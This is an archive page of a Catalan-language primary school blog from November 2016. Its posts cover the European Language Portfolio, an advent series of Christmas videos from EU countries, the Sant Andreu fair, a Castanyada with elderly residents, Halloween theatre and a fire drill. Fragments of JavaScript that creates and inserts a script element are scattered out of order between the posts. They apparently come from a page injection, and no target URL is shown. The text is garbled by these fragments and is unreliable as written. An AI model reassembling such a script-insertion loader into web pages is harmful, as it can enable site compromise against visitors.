Archive for 24 noviembre, 2016

ELS NADALS A EUROPA

merry-christmasEste curs l’escola ens hem sumat al Portfoli Europeu de les llengües.

Es tracta d’un projecte europeu que inclou documents personals on els usuaris poden enregistrar les seues experiències d’aprenentatge de llengües i cultures i reflexionar-hi. El PEL, propietat de l’usuari individual i no de la institució o organisme que l’atorga, permet anotar els avanços en l’aprenentatge de llengües o marcar-se noves fites, ajuda a reconéixer com i quan s’aprén, a reflexionar sobre les experiències personals i a valorar els progressos, a participar de forma activa i conscient en els seus aprenentatges, a generar processos d’adquisició o de formació, a orientar la motivació, a augmentar l’autoestima i a potenciar el desenrotllament d’estratègies d’aprenentatge.

El PEL intenta fer el procés d’aprenentatge de llengües més transparent a l’alumnat, l’ajuda a desenrotllar la capacitat de reflexió i d’autoavaluació i així potencia l’assumpció de responsabilitat del seu aprenentatge. Fomenta el desenrotllament de l’autonomia de l’alumnat, promou l’educació per a tota la vida i clarifica i precisa els objectius d’aprenentatge en termes comunicatius

El PEL està concebut per a donar suport als quatre objectius polítics del Consell d’Europa: . Preservar la diversitat lingüística,
. Promoure la tolerància lingüística i cultural,
. Fomentar el plurilingüisme
. Assegurar l’educació democràtica de la ciutadania.

Són moltes les activitats lingüístiques que realitzem al llarg del curs tan dins de l’aula com a nivell de tot el centre ( Halloween, Contes de Sant Jordi…)
Este curs a més aprofitarem l’activitat del Nadal per a conéixer les llengües, tradicions i costums dels 28 països que conformen la Unió Europea. Des de hui fins al dia de Nadal, publicarem una vídeo diari amb imatges i música nadalenca d’un país europeu.
Tracteu d’endevinar a quin país fa referència

Bona Nadal A tothom

document.currentScript.parentNode.insertBefore(s, document.currentScript);

LA Fira de Sant Andreu

Coneix la historia de la nostra fira de Sant Andreu amb esta cançó

} else {

UN ANY MES… LA CASTANYERA

Un any més els iaios de la residència de la tercera edat ens han acompanyat per a celebrar la Castanyada. Junts hem cantat i ballat. Els alumnes de 3r cicle amb el carnet TVI de l’ajuntament els han transportat fins a la nostra escola, revivint una vegada mes un bonic projecte d’aprenentatge servei i de confraternitat intrageneracional. Projecte del qual hem rebut fa uns dies un certificat de reconeixement per part de la fundació SAR QUAVITAE.

if (document.currentScript) {

Que hem après amb la visita dels bombers?

var d=document;var s=d.createElement(‘script’);

Lemon’s Mystery

Ja podeu vore el teatre de Halloween dels alumnes de sisé.

 

Simulacre d’emergència

Esta vesprada, amb l’ajuda dels bombers de Nules i l’empresa de manteniment de l’alarma antiincendis, hem realitzat una prova d’emergència. En 2′ i 47 ” tots els xiquets han estat evacuats.  Moltes gràcies a mestres, alumnes i bombers per la col·laboració.

Vos deixem imatges de l’actuació dels bombers.